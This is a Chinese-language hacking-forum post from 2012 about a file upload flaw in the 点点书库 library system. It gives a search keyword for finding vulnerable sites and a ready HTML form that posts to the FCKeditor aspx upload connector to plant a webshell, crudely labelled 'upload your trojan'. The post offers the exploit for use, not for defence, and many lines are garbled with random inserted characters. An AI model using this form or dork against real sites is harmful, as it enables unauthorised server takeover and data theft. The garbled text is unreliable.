中国网络渗透测试联盟

标题: 点点书库图书馆系统文件上传漏洞 [打印本页]
作者: admin    时间: 2012-9-10 21:20
标题: 点点书库图书馆系统文件上传漏洞
主题:图书馆系统任意文件上传漏洞; `1 F3 n4 ~, a* t
作者:冰锋刺客. b5 J9 [' r/ P  B% N
厂商:点击书(dianjishu.com)
  i9 b9 Y7 g( I 日期:2012-6-21
& s) R: U' m( j( e
5 Y5 @& u- r# ~. y3 qI 概述& T0 g: d) ]% J1 v" J% t, D0 F$ k+ h
   点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell
! x9 `- K  z8 Z II 简介  r. A& n0 H  }- [- z7 J  o
   关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
7 X& N+ A2 o& }' l% h. u1 J 补充一个漏洞( z6 o% z8 H9 g8 I, [$ u+ K! c
<form id="frmUpload" enctype="multipart/form-data") s& ]9 R. ^5 f
action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>) K% I9 K3 P$ Q
<input id="btnUpload" type="submit" value="操翻他">
3 s! y% Z9 E) k% t; S$ m' _ </form>2 E9 I* R/ g. E
你们懂的% L1 B: e% Z7 N: M. z0 C
那傻逼提供还需要改包.
( _" F. ?& [& i! l4 Z$ _. [5 I 自己看了下源代码发现fckeditor! w* o9 W8 Z, ?! V$ X6 d
直接秒杀1 @  B5 ^+ }# Y- F- i0 m




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2